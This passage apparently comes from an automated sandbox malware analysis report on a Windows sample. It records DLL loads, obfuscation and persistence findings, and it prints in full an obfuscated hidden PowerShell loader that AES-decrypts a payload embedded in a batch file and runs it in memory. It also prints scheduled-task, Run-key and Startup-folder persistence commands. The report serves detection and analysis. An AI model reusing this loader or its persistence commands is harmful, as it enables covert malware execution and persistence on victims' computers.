        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: atl.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: amsi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: msisip.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: wshext.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: appxsip.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: atl.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: amsi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: msisip.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: wshext.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: appxsip.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: opcservices.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: e45iasd.lnk.16.drLNK file: ..\..\..\..\..\..\Local\Temp\e45iasd.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: powershell.pdbUGP source: e45iasd.exe, 00000016.00000000.1556727375.00007FF6D073A000.00000002.00000001.01000000.0000000A.sdmp, e45iasd.exe.16.dr
        Source: Binary string: powershell.pdb source: e45iasd.exe, 00000016.00000000.1556727375.00007FF6D073A000.00000002.00000001.01000000.0000000A.sdmp, e45iasd.exe.16.dr

        Data Obfuscation

        barindex
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
        Source: 5.2.powershell.exe.263b45551b0.9.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
        Source: 5.2.powershell.exe.263bc030000.12.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
        Source: 5.2.powershell.exe.263b45a51e8.8.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: e45iasd.exe.16.drStatic PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C402FD push ds; iretd 5_2_00007FF886C403E2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886C47920 pushad ; retf 5F4Dh5_2_00007FF886C4799D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886D133EC pushfd ; iretd 5_2_00007FF886D133ED
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF886B3D2A5 pushad ; iretd 8_2_00007FF886B3D2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF886B3FC75 pushad ; iretd 8_2_00007FF886B3FC77
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF886C50B9A push ds; iretd 8_2_00007FF886C50BA2
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C5776A pushad ; iretd 24_2_00007FF886C5785D
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C5785E push eax; iretd 24_2_00007FF886C5786D
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C6785E push eax; iretd 24_2_00007FF886C6786D
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C677FB pushad ; iretd 24_2_00007FF886C6785D
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C50B9A push ds; iretd 24_2_00007FF886C50BA2
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 24_2_00007FF886C57918 push ebx; retf 24_2_00007FF886C5796A
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4776A pushad ; iretd 26_2_00007FF886C4785D
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C4785E push eax; iretd 26_2_00007FF886C4786D
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C40B9A push ds; iretd 26_2_00007FF886C40BA2
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeCode function: 26_2_00007FF886C47963 push ebx; retf 26_2_00007FF886C4796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\e45iasd.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e45iasd.lnkJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e45iasd.lnkJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e45iasdJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e45iasdJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
